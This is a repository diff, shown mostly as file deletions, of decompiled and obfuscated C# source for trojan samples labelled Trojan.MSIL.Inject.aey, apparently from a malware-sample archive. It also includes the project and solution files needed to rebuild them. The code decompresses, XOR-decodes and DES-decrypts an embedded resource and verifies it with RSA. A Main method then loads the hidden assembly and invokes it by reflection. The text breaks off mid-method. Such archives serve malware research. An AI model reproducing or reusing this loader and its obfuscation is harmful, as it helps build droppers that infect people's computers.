// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.Inject.aey-567b94bcdaea498b72ea3b4193d16a0eeb6807a02fefe59b9b87d0ae03d8dcd4.exe
using System;
using System.IO;
internal sealed class \uE00E
{
public static void \uE000(Stream _param0, Stream _param1)
{
byte[] buffer = new byte[4096];
\uE00E.\uE000 obj = new \uE00E.\uE000(_param0);
while (true)
{
int count = obj.\uE000(buffer, 0, buffer.Length);
if ((count <= 0 ? 0 : 1) != 0)
_param1.Write(buffer, 0, count);
else
break;
}
}
public sealed class \uE000
{
private \uE00E.\uE009 \uE000 = new \uE00E.\uE009(32769);
private \uE00E.\uE008 \uE001;
private \uE00D \uE002;
private int \uE003 = -1;
private int \uE004 = -1;
private bool \uE005;
private int \uE006;
private long \uE007;
private long \uE008;
private bool \uE009;
private int \uE00A;
private bool \uE00B;
public \uE000(Stream _param1) => this.\uE001 = new \uE00E.\uE008(_param1);
public int \uE000(byte[] _param1, int _param2, int _param3)
{
if ((_param1 == null ? 0 : 1) == 0)
throw new ArgumentNullException();
if (_param3 == 0 || this.\uE009)
return 0;
int num1 = 0;
label_15:
while (num1 < _param3)
{
while (this.\uE003 < 0 && !this.\uE009)
this.\uE009 = !this.\uE001();
if (!this.\uE009)
{
int num2 = this.\uE002(_param1, _param2 + num1, _param3 - num1);
label_10:
int num3 = 0;
while (true)
{
switch (num3)
{
case 0:
if (num2 > 0)
{
num3 = 1;
continue;
}
goto label_14;
case 1:
num1 += num2;
num3 = 2;
continue;
case 2:
goto label_15;
default:
goto label_10;
}
}
label_14:
this.\uE003 = -1;
}
else
break;
}
return num1;
}
private bool \uE001()
{
if ((!this.\uE005 ? 1 : 0) == 0)
return false;
this.\uE007 = this.\uE001.\uE004;
label_4:
int num1 = 2;
int num2;
while (true)
{
switch (num1)
{
case 0:
switch (num2)
{
case 0:
goto label_10;
case 1:
goto label_13;
case 2:
goto label_14;
default:
num1 = 4;
continue;
}
case 1:
this.\uE003 = this.\uE001.\uE000(2);
num1 = 3;
continue;
case 2:
this.\uE005 = this.\uE001.\uE000(1) > 0;
num1 = 1;
continue;
case 3:
num2 = this.\uE003;
num1 = 0;
continue;
case 4:
goto label_15;
default:
goto label_4;
}
}
label_10:
this.\uE001.\uE001();
int num3 = this.\uE001.\uE000(16);
int num4 = this.\uE001.\uE000(16);
this.\uE006 = (num3 & ~num4) == num3 ? num3 : throw new InvalidOperationException();
this.\uE002 = (\uE00D) null;
this.\uE00B = true;
goto label_16;
label_13:
\uE00B[] objArray1 = \uE00A.\uE011;
\uE00B[] objArray2 = \uE00A.\uE012;
this.\uE006 = 0;
this.\uE002 = \uE00A.\uE013;
this.\uE00B = false;
goto label_16;
label_14:
\uE00B[] objArray3;
\uE00B[] objArray4;
this.\uE009(this.\uE001, out objArray3, out objArray4);
this.\uE006 = 0;
this.\uE002 = \uE00A.\uE004(objArray3, objArray4);
this.\uE00B = false;
goto label_16;
label_15:
throw new InvalidOperationException();
label_16:
this.\uE008 = this.\uE001.\uE004;
return true;
}
private int \uE002(byte[] _param1, int _param2, int _param3)
{
int num1 = _param2;
if ((this.\uE003 == 0 ? 0 : 1) == 0)
{
if (this.\uE006 > 0)
{
int num2 = Math.Min(_param3, this.\uE006);
label_4:
int num3 = 3;
while (true)
{
switch (num3)
{
case 0:
_param2 += num2;
num3 = 5;
continue;
case 1:
_param3 -= num2;
num3 = 0;
continue;
case 2:
this.\uE000.\uE001(_param1, _param2, num2);
num3 = 4;
continue;
case 3:
this.\uE001.\uE002(_param1, _param2, num2);
num3 = 2;
continue;
case 4:
this.\uE006 -= num2;
num3 = 1;
continue;
case 5:
goto label_22;
default:
goto label_4;
}
}
}
}
else if (!this.\uE00B)
{
if (this.\uE00A > 0)
this.\uE003(_param1, ref _param2, ref _param3);
if (_param3 > 0)
{
do
{
int num4 = \uE00E.\uE000.\uE006(this.\uE001, this.\uE002.\uE000);
this.\uE00B = num4 == 256;
if (!this.\uE00B)
{
if (num4 < 256)
{
_param1[_param2++] = (byte) num4;
this.\uE000.\uE000((byte) num4);
--_param3;
}
else if (num4 <= 285)
{
int num5 = \uE00E.\uE000.\uE007(this.\uE001, num4);
int num6 = \uE00E.\uE000.\uE008(this.\uE001, this.\uE002.\uE001);
if ((long) num6 > this.\uE000.\uE003)
throw new InvalidOperationException();
this.\uE004 = num6;
this.\uE00A = num5;
this.\uE003(_param1, ref _param2, ref _param3);
}
}
else
break;
}
while (_param3 > 0);
}
}
label_22:
this.\uE008 = this.\uE001.\uE004;
return _param2 - num1;
}
private void \uE003(byte[] _param1, ref int _param2, ref int _param3)
{
int num1 = Math.Min(this.\uE00A, _param3);
byte[] sourceArray = this.\uE000.\uE002(this.\uE004, Math.Min(num1, this.\uE004));
_param3 -= num1;
this.\uE00A -= num1;
while ((num1 <= sourceArray.Length ? 0 : 1) != 0)
{
Array.Copy((Array) sourceArray, 0, (Array) _param1, _param2, sourceArray.Length);
label_3:
int num2 = 0;
while (true)
{
switch (num2)
{
case 0:
_param2 += sourceArray.Length;
num2 = 1;
continue;
case 1:
num1 -= sourceArray.Length;
num2 = 2;
continue;
case 2:
goto label_6;
default:
goto label_3;
}
}
label_6:
this.\uE000.\uE001(sourceArray, 0, sourceArray.Length);
}
Array.Copy((Array) sourceArray, 0, (Array) _param1, _param2, num1);
_param2 += num1;
this.\uE000.\uE001(sourceArray, 0, num1);
}
public bool \uE004(int _param1)
{
byte[] numArray = new byte[1024];
int num;
while (_param1 > 0 && ((num = this.\uE000(numArray, 0, Math.Min(1024, _param1))) <= 0 ? 0 : 1) != 0)
_param1 -= num;
return _param1 <= 0;
}
public void \uE005()
{
byte[] numArray = new byte[1024];
do
;
while (this.\uE000(numArray, 0, 1024) > 0);
}
private static int \uE006(\uE00E.\uE008 _param0, \uE00C _param1)
{
while (true)
{
if (_param1 == null)
goto label_7;
else
goto label_4;
label_3:
int num;
while (true)
{
switch (num)
{
case 0:
if (_param1.\uE000)
{
num = 1;
continue;
}
goto label_1;
case 1:
goto label_7;
case 2:
goto label_9;
default:
goto label_4;
}
}
label_1:
_param1 = (_param0.\uE000(1) <= 0 ? 0 : 1) != 0 ? _param1.\uE003 : _param1.\uE002;
continue;
label_4:
num = 0;
goto label_3;
label_7:
if (_param1 == null)
{
num = 2;
goto label_3;
}
else
goto label_10;
}
label_9:
throw new InvalidOperationException();
label_10:
return (int) _param1.\uE001;
}
private static int \uE007(\uE00E.\uE008 _param0, int _param1)
{
int num1;
int num2;
\uE00A.\uE007(_param1, out num1, out num2);
label_2:
int num3 = 0;
while (true)
{
switch (num3)
{
case 0:
if (num2 > 0)
{
num3 = 1;
continue;
}
goto label_6;
case 1:
goto label_5;
default:
goto label_2;
}
}
label_5:
return num1 + _param0.\uE000(num2);
label_6:
return num1;
}
private static int \uE008(\uE00E.\uE008 _param0, \uE00C _param1)
{
int index = \uE00E.\uE000.\uE006(_param0, _param1);
int num1 = index <= 29 ? \uE00A.\uE017[index] : throw new InvalidOperationException();
label_4:
int num2 = 1;
int num3;
int num4;
while (true)
{
switch (num2)
{
case 0:
if (num3 > 0)
{
num2 = 4;
continue;
}
goto label_15;
case 1:
num3 = \uE00A.\uE018[index];
num2 = 0;
continue;
case 2:
if (index == 284)
{
num2 = 3;
continue;
}
goto label_14;
case 3:
if (num4 > 30)
{
num2 = 5;
continue;
}
goto label_14;
case 4:
num4 = _param0.\uE000(num3);
num2 = 2;
continue;
case 5:
goto label_13;
default:
goto label_4;
}
}
label_13:
throw new InvalidOperationException();
label_14:
return num1 + num4;
label_15:
return num1;
}
private void \uE009(\uE00E.\uE008 _param1, out \uE00B[] _param2, out \uE00B[] _param3)
{
int length1 = _param1.\uE000(5) + 257;
label_2:
int num1 = 1;
int num2;
int length2;
while (true)
{
switch (num1)
{
case 0:
num2 = _param1.\uE000(4) + 4;
num1 = 2;
continue;
case 1:
length2 = _param1.\uE000(5) + 1;
num1 = 0;
continue;
case 2:
if (length1 > 286)
{
num1 = 3;
continue;
}
goto label_8;
case 3:
goto label_7;
default:
goto label_2;
}
}
label_7:
throw new InvalidOperationException();
label_8:
int[] numArray1 = \uE00A.\uE014;
int[] numArray2 = new int[19];
int index1 = 0;
if ((index1 == 0 ? 1 : 0) != 0)
goto label_10;
label_9:
numArray2[numArray1[index1]] = _param1.\uE000(3);
++index1;
label_10:
if (index1 >= num2)
{
\uE00C obj = \uE00A.\uE005(\uE00A.\uE002(numArray2));
int[] numArray3 = \uE00E.\uE000.\uE00A(_param1, obj, length1 + length2);
_param2 = new \uE00B[length1];
for (int index2 = 0; index2 < length1; ++index2)
_param2[index2].\uE001 = numArray3[index2];
\uE00A.\uE003(_param2);
_param3 = new \uE00B[length2];
for (int index3 = 0; index3 < length2; ++index3)
_param3[index3].\uE001 = numArray3[index3 + length1];
\uE00A.\uE003(_param3);
}
else
goto label_9;
}
private static int[] \uE00A(\uE00E.\uE008 _param0, \uE00C _param1, int _param2)
{
int[] numArray = new int[_param2];
int index1 = 0;
if ((index1 == 0 ? 1 : 0) != 0)
goto label_22;
label_1:
int num1 = \uE00E.\uE000.\uE006(_param0, _param1);
label_3:
int num2 = 1;
while (true)
{
switch (num2)
{
case 0:
numArray[index1] = num1;
num2 = 2;
continue;
case 1:
if (num1 < 16)
{
num2 = 0;
continue;
}
goto label_7;
case 2:
goto label_21;
default:
goto label_3;
}
}
label_7:
switch (num1)
{
case 16:
int num3 = _param0.\uE000(2) + 3;
if (num3 + index1 > numArray.Length)
throw new InvalidOperationException();
for (int index2 = 0; index2 < num3; ++index2)
numArray[index1 + index2] = numArray[index1 - 1];
index1 += num3 - 1;
break;
case 17:
int num4 = _param0.\uE000(3) + 3;
if (num4 + index1 > numArray.Length)
throw new InvalidOperationException();
index1 += num4 - 1;
break;
case 18:
int num5 = _param0.\uE000(7) + 11;
if (num5 + index1 > numArray.Length)
throw new InvalidOperationException();
index1 += num5 - 1;
break;
default:
throw new InvalidOperationException();
}
label_21:
++index1;
label_22:
if (index1 >= _param2)
return numArray;
goto label_1;
}
}
private sealed class \uE008
{
private uint \uE000;
private int \uE001;
private int \uE002;
private Stream \uE003;
internal long \uE004;
internal \uE008(Stream _param1) => this.\uE003 = _param1;
internal int \uE000(int _param1)
{
this.\uE004 += (long) _param1;
for (int index = _param1 - (this.\uE002 - this.\uE001); (index <= 0 ? 0 : 1) != 0; index -= 8)
{
this.\uE000 |= checked ((uint) this.\uE003.ReadByte()) << this.\uE002;
this.\uE002 += 8;
}
int num1 = (int) (this.\uE000 >> this.\uE001) & (1 << _param1) - 1;
label_5:
int num2 = 2;
while (true)
{
switch (num2)
{
case 0:
this.\uE002 = this.\uE001 = 0;
num2 = 1;
continue;
case 1:
this.\uE000 = 0U;
num2 = 4;
continue;
case 2:
this.\uE001 += _param1;
num2 = 3;
continue;
case 3:
if (this.\uE002 == this.\uE001)
{
num2 = 0;
continue;
}
goto label_11;
case 4:
goto label_13;
default:
goto label_5;
}
}
label_11:
if (this.\uE001 >= 8)
{
this.\uE000 >>= this.\uE001;
this.\uE002 -= this.\uE001;
this.\uE001 = 0;
}
label_13:
return num1;
}
internal void \uE001()
{
if (this.\uE002 != this.\uE001)
this.\uE004 += (long) (this.\uE002 - this.\uE001);
this.\uE002 = this.\uE001 = 0;
label_4:
int num = 0;
while (true)
{
switch (num)
{
case 0:
this.\uE000 = 0U;
num = 1;
continue;
case 1:
goto label_6;
default:
goto label_4;
}
}
label_6:;
}
internal void \uE002(byte[] _param1, int _param2, int _param3)
{
if (this.\uE002 != this.\uE001)
throw new InvalidOperationException();
int num1 = this.\uE003.Read(_param1, _param2, _param3);
label_4:
int num2 = 0;
while (true)
{
switch (num2)
{
case 0:
this.\uE004 += (long) (num1 << 3);
num2 = 1;
continue;
case 1:
if (num1 != _param3)
{
num2 = 2;
continue;
}
goto label_7;
case 2:
goto label_9;
default:
goto label_4;
}
}
label_7:
return;
label_9:
throw new InvalidOperationException();
}
}
private sealed class \uE009
{
private byte[] \uE000;
private int \uE001;
internal int \uE002;
internal long \uE003;
internal \uE009(int _param1)
{
this.\uE002 = _param1;
this.\uE000 = new byte[_param1];
}
internal void \uE000(byte _param1)
{
this.\uE000[this.\uE001++] = _param1;
if ((this.\uE001 >= this.\uE002 ? 0 : 1) == 0)
this.\uE001 = 0;
++this.\uE003;
}
internal void \uE001(byte[] _param1, int _param2, int _param3)
{
this.\uE003 += (long) _param3;
if ((_param3 >= this.\uE002 ? 0 : 1) == 0)
{
Array.Copy((Array) _param1, _param2, (Array) this.\uE000, 0, this.\uE002);
this.\uE001 = 0;
}
else if (this.\uE001 + _param3 > this.\uE002)
{
int length1 = this.\uE002 - this.\uE001;
label_5:
int num = 2;
int length2;
while (true)
{
switch (num)
{
case 0:
Array.Copy((Array) _param1, _param2 + length1, (Array) this.\uE000, 0, length2);
num = 1;
continue;
case 1:
this.\uE001 = length2;
num = 4;
continue;
case 2:
length2 = this.\uE001 + _param3 - this.\uE002;
num = 3;
continue;
case 3:
Array.Copy((Array) _param1, _param2, (Array) this.\uE000, this.\uE001, length1);
num = 0;
continue;
case 4:
goto label_12;
default:
goto label_5;
}
}
label_12:;
}
else
{
Array.Copy((Array) _param1, _param2, (Array) this.\uE000, this.\uE001, _param3);
this.\uE001 += _param3;
if (this.\uE001 != this.\uE002)
return;
this.\uE001 = 0;
}
}
internal byte[] \uE002(int _param1, int _param2)
{
byte[] destinationArray = new byte[_param2];
if ((this.\uE001 >= _param1 ? 0 : 1) == 0)
{
Array.Copy((Array) this.\uE000, this.\uE001 - _param1, (Array) destinationArray, 0, _param2);
}
else
{
int num1 = _param1 - this.\uE001;
label_4:
int num2 = 1;
while (true)
{
switch (num2)
{
case 0:
Array.Copy((Array) this.\uE000, 0, (Array) destinationArray, num1, _param2 - num1);
num2 = 3;
continue;
case 1:
if (num1 < _param2)
{
num2 = 2;
continue;
}
goto label_9;
case 2:
Array.Copy((Array) this.\uE000, this.\uE002 - num1, (Array) destinationArray, 0, num1);
num2 = 0;
continue;
case 3:
goto label_10;
default:
goto label_4;
}
}
label_9:
Array.Copy((Array) this.\uE000, this.\uE002 - num1, (Array) destinationArray, 0, _param2);
}
label_10:
return destinationArray;
}
}
}

1584
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.aey-567b94bcdaea498b72ea3b4193d16a0eeb6807a02fefe59b9b87d0ae03d8dcd4/.cs
View File

File diff suppressed because it is too large Load Diff

419
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.aey-567b94bcdaea498b72ea3b4193d16a0eeb6807a02fefe59b9b87d0ae03d8dcd4/.cs
View File

@ -1,419 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Monkey, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F37CDE57-2934-4BAC-94FE-68C4082667EF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.Inject.aey-567b94bcdaea498b72ea3b4193d16a0eeb6807a02fefe59b9b87d0ae03d8dcd4.exe
using System;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;
internal sealed class \uE010
{
private const int \uE000 = 8;
private const int \uE001 = 20;
private const int \uE002 = 4;
private static byte[] \uE003 = new byte[4];
private static byte[] \uE004;
static \uE010()
{
label_2:
int num = 0;
while (true)
{
switch (num)
{
case 0:
\uE010.\uE004 = new byte[4];
num = 4;
continue;
case 1:
\uE010.\uE003[1] = \uE010.\uE004[1] = (byte) 83;
num = 3;
continue;
case 2:
\uE010.\uE004[3] = (byte) 50;
num = 6;
continue;
case 3:
\uE010.\uE003[2] = \uE010.\uE004[2] = (byte) 65;
num = 5;
continue;
case 4:
\uE010.\uE003[0] = \uE010.\uE004[0] = (byte) 82;
num = 1;
continue;
case 5:
\uE010.\uE003[3] = (byte) 49;
num = 2;
continue;
case 6:
goto label_9;
default:
goto label_2;
}
}
label_9:;
}
public static MemoryStream \uE000(Stream _param0)
{
BinaryReader binaryReader1 = new BinaryReader(_param0);
DESCryptoServiceProvider cryptoServiceProvider1 = new DESCryptoServiceProvider();
bool flag1 = binaryReader1.ReadBoolean();
int count1 = (int) binaryReader1.ReadUInt16();
byte[] buffer1 = new byte[count1];
binaryReader1.Read(buffer1, 0, count1);
if ((!flag1 ? 1 : 0) == 0)
{
byte[] buffer2 = new byte[8];
binaryReader1.Read(buffer2, 0, 8);
for (int index = 0; index < count1; ++index)
buffer1[index] = (byte) ((uint) buffer1[index] ^ (uint) buffer2[index % 8]);
}
BinaryReader binaryReader2 = new BinaryReader((Stream) new MemoryStream(buffer1, false));
label_6:
int num = 7;
int count2;
int count3;
bool flag2;
byte[] numArray;
byte[] buffer3;
bool flag3;
while (true)
{
switch (num)
{
case 0:
count2 = (int) binaryReader2.ReadByte();
num = 3;
continue;
case 1:
count3 = (int) binaryReader2.ReadByte();
num = 8;
continue;
case 2:
flag2 = binaryReader2.ReadBoolean();
num = 0;
continue;
case 3:
numArray = new byte[count2];
num = 4;
continue;
case 4:
if (flag2)
{
num = 10;
continue;
}
goto label_19;
case 5:
binaryReader2.Read(buffer3, 0, count3);
num = 6;
continue;
case 6:
cryptoServiceProvider1.IV = buffer3;
num = 2;
continue;
case 7:
binaryReader2.ReadString();
num = 9;
continue;
case 8:
buffer3 = new byte[count3];
num = 5;
continue;
case 9:
flag3 = binaryReader2.ReadBoolean();
num = 1;
continue;
case 10:
goto label_18;
default:
goto label_6;
}
}
label_18:
binaryReader2.Read(numArray, 0, count2);
label_19:
RSACryptoServiceProvider cryptoServiceProvider2 = (RSACryptoServiceProvider) null;
int count4 = binaryReader2.ReadInt32();
byte[] buffer4 = new byte[count4];
binaryReader2.Read(buffer4, 0, count4);
if (!flag2)
{
byte[] publicKey = Assembly.GetExecutingAssembly().GetName().GetPublicKey();
if (publicKey == null || publicKey.Length != 160)
throw new InvalidOperationException();
Buffer.BlockCopy((Array) publicKey, 12, (Array) numArray, 0, count2);
numArray[5] |= (byte) 128;
cryptoServiceProvider2 = new RSACryptoServiceProvider();
cryptoServiceProvider2.ImportParameters(\uE010.\uE003(publicKey));
}
cryptoServiceProvider1.Key = numArray;
MemoryStream memoryStream = new MemoryStream();
using (CryptoStream cryptoStream = new CryptoStream(binaryReader1.BaseStream, cryptoServiceProvider1.CreateDecryptor(), CryptoStreamMode.Read))
{
if (flag3)
\uE00E.\uE000((Stream) cryptoStream, (Stream) memoryStream);
else
\uE010.\uE002((Stream) cryptoStream, (Stream) memoryStream);
}
if (cryptoServiceProvider2 != null)
{
memoryStream.Position = 0L;
if (!\uE010.\uE005(cryptoServiceProvider2, (Stream) memoryStream, buffer4))
throw new InvalidOperationException();
}
memoryStream.Position = 0L;
return memoryStream;
}
private static byte[] \uE001(byte[] _param0, int _param1, int _param2)
{
if ((_param0 == null ? 1 : 0) == 0)
{
label_2:
int num = 0;
while (true)
{
switch (num)
{
case 0:
if (_param0.Length < _param1 + _param2)
{
num = 1;
continue;
}
goto label_6;
case 1:
goto label_5;
default:
goto label_2;
}
}
label_6:
byte[] destinationArray = new byte[_param2];
Array.Copy((Array) _param0, _param1, (Array) destinationArray, 0, _param2);
return destinationArray;
}
label_5:
return (byte[]) null;
}
private static void \uE002(Stream _param0, Stream _param1)
{
byte[] buffer = new byte[4096];
while (true)
{
int count = _param0.Read(buffer, 0, buffer.Length);
if ((count <= 0 ? 0 : 1) != 0)
_param1.Write(buffer, 0, count);
else
break;
}
}
private static RSAParameters \uE003(byte[] _param0)
{
bool flag = _param0.Length == 160;
if ((!flag ? 1 : 0) == 0 && !\uE010.\uE004(_param0, \uE010.\uE003, 20))
return new RSAParameters();
if (!flag && !\uE010.\uE004(_param0, \uE010.\uE004, 8))
return new RSAParameters();
RSAParameters rsaParameters = new RSAParameters();
int num1 = (flag ? 20 : 8) + 8;
int num2 = 4;
rsaParameters.Exponent = \uE010.\uE001(_param0, num1, num2);
Array.Reverse((Array) rsaParameters.Exponent);
int num3 = num1 + num2;
int num4 = 128;
rsaParameters.Modulus = \uE010.\uE001(_param0, num3, num4);
Array.Reverse((Array) rsaParameters.Modulus);
if (flag)
return rsaParameters;
int num5 = num3 + num4;
label_8:
int num6 = 14;
while (true)
{
switch (num6)
{
case 0:
rsaParameters.P = \uE010.\uE001(_param0, num5, num4);
num6 = 12;
continue;
case 1:
rsaParameters.DQ = \uE010.\uE001(_param0, num5, num4);
num6 = 6;
continue;
case 2:
num5 += num4;
num6 = 15;
continue;
case 3:
rsaParameters.D = \uE010.\uE001(_param0, num5, num4);
num6 = 10;
continue;
case 4:
num5 += num4;
num6 = 7;
continue;
case 5:
rsaParameters.InverseQ = \uE010.\uE001(_param0, num5, num4);
num6 = 9;
continue;
case 6:
Array.Reverse((Array) rsaParameters.DQ);
num6 = 2;
continue;
case 7:
num4 = 64;
num6 = 1;
continue;
case 8:
num4 = 64;
num6 = 17;
continue;
case 9:
Array.Reverse((Array) rsaParameters.InverseQ);
num6 = 13;
continue;
case 10:
Array.Reverse((Array) rsaParameters.D);
num6 = 23;
continue;
case 11:
Array.Reverse((Array) rsaParameters.DP);
num6 = 4;
continue;
case 12:
Array.Reverse((Array) rsaParameters.P);
num6 = 16;
continue;
case 13:
num5 += num4;
num6 = 19;
continue;
case 14:
num4 = 64;
num6 = 0;
continue;
case 15:
num4 = 64;
num6 = 5;
continue;
case 16:
num5 += num4;
num6 = 21;
continue;
case 17:
rsaParameters.DP = \uE010.\uE001(_param0, num5, num4);
num6 = 11;
continue;
case 18:
rsaParameters.Q = \uE010.\uE001(_param0, num5, num4);
num6 = 20;
continue;
case 19:
num4 = 128;
num6 = 3;
continue;
case 20:
Array.Reverse((Array) rsaParameters.Q);
num6 = 22;
continue;
case 21:
num4 = 64;
num6 = 18;
continue;
case 22:
num5 += num4;
num6 = 8;
continue;
case 23:
goto label_32;
default:
goto label_8;
}
}
label_32:
return rsaParameters;
}
private static bool \uE004(byte[] _param0, byte[] _param1, int _param2)
{
int index = 0;
if ((index == 0 ? 1 : 0) != 0)
goto label_7;
else
goto label_2;
label_1:
int num;
switch (num)
{
case 0:
goto label_3;
case 1:
return false;
}
label_2:
num = 0;
goto label_1;
label_3:
if ((int) _param0[index + _param2] != (int) _param1[index])
{
num = 1;
goto label_1;
}
else
++index;
label_7:
if (index >= _param1.Length)
return true;
goto label_3;
}
private static bool \uE005(RSACryptoServiceProvider _param0, Stream _param1, byte[] _param2)
{
SHA1CryptoServiceProvider cryptoServiceProvider = new SHA1CryptoServiceProvider();
label_2:
int num = 0;
byte[] hash;
string name;
while (true)
{
switch (num)
{
case 0:
hash = cryptoServiceProvider.ComputeHash(_param1);
num = 3;
continue;
case 1:
name += (string) (object) 'A';
num = 4;
continue;
case 2:
name += (string) (object) 'H';
num = 1;
continue;
case 3:
name = new string('S', 1);
num = 2;
continue;
case 4:
name += (string) (object) '1';
num = 5;
continue;
case 5:
goto label_8;
default:
goto label_2;
}
}
label_8:
return _param0.VerifyHash(hash, CryptoConfig.MapNameToOID(name), _param2);
}
}

5
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.aey-987a459213fe3739f0b3a9599a965c98fd7ffe48217cb7051649767b5815a87d/AssemblyInfo.cs
View File

@ -1,5 +0,0 @@
using System.Reflection;
using System.Runtime.CompilerServices;
[assembly: SuppressIldasm]
[assembly: AssemblyVersion("0.0.0.0")]

53
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.aey-987a459213fe3739f0b3a9599a965c98fd7ffe48217cb7051649767b5815a87d/Trojan.MSIL.Inject.aey.csproj
View File

@ -1,53 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.Inject.aey-987a459213fe3739f0b3a9599a965c98fd7ffe48217cb7051649767b5815a87d.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{86891AEE-6A9A-4C02-8B63-A57C28DC0D11}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Monkey</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003C.cs" />
<Compile Include=".cs" />
<Compile Include=".cs" />
<Compile Include=".cs" />
<Compile Include=".cs" />
<Compile Include=".cs" />
<Compile Include=".cs" />
<Compile Include=".cs" />
<Compile Include=".cs" />
<Compile Include=".cs" />
<Compile Include=".cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="ed404015d077ea06" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>

20
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.aey-987a459213fe3739f0b3a9599a965c98fd7ffe48217cb7051649767b5815a87d/Trojan.MSIL.Inject.aey.sln
View File

@ -1,20 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Monkey", "Trojan.MSIL.Inject.aey-987a459213fe3739f0b3a9599a965c98fd7ffe48217cb7051649767b5815a87d.csproj", "{86891AEE-6A9A-4C02-8B63-A57C28DC0D11}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{86891AEE-6A9A-4C02-8B63-A57C28DC0D11}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{86891AEE-6A9A-4C02-8B63-A57C28DC0D11}.Debug|Any CPU.Build.0 = Debug|Any CPU
{86891AEE-6A9A-4C02-8B63-A57C28DC0D11}.Release|Any CPU.ActiveCfg = Release|Any CPU
{86891AEE-6A9A-4C02-8B63-A57C28DC0D11}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

9
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.aey-987a459213fe3739f0b3a9599a965c98fd7ffe48217cb7051649767b5815a87d/_003C.cs
View File

@ -1,9 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: <
// Assembly: Monkey, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F37CDE57-2934-4BAC-94FE-68C4082667EF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.Inject.aey-987a459213fe3739f0b3a9599a965c98fd7ffe48217cb7051649767b5815a87d.exe
internal sealed class \u003C
{
}

21
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.aey-987a459213fe3739f0b3a9599a965c98fd7ffe48217cb7051649767b5815a87d/.cs
View File

@ -1,21 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Monkey, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F37CDE57-2934-4BAC-94FE-68C4082667EF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.Inject.aey-987a459213fe3739f0b3a9599a965c98fd7ffe48217cb7051649767b5815a87d.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Reflection;
[StandardModule]
internal sealed class \uE000
{
static \uE000() => \uE008.\uE000();
[STAThread]
public static void Main()
{
Assembly assembly = (Assembly) Assembly.Load(.\uE004).GetType(.\uE002 + .\uE007 + .\uE003).GetMethod(.\uE005).Invoke((object) .\uE006, new object[0]);
}
}

498
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.aey-987a459213fe3739f0b3a9599a965c98fd7ffe48217cb7051649767b5815a87d/.cs
View File

@ -1,498 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Monkey, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F37CDE57-2934-4BAC-94FE-68C4082667EF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.Inject.aey-987a459213fe3739f0b3a9599a965c98fd7ffe48217cb7051649767b5815a87d.exe
using System;
using System.IO;
using System.Reflection;
using System.Threading;
internal sealed class \uE008
{
private static Assembly \uE000;
private static object \uE001 = new object();
private static int \uE002;
private static string[] \uE003;
public static void \uE000()
{
if ((\uE008.\uE002 == 0 ? 0 : 1) != 0)
return;
try
{
Monitor.Enter(\uE008.\uE001);
if ((\uE008.\uE002 == 0 ? 0 : 1) != 0)
return;
label_19:
int num1 = -226195680;
int num2 = -561798657;
label_3:
while (true)
{
num2 ^= 555203725;
label_11:
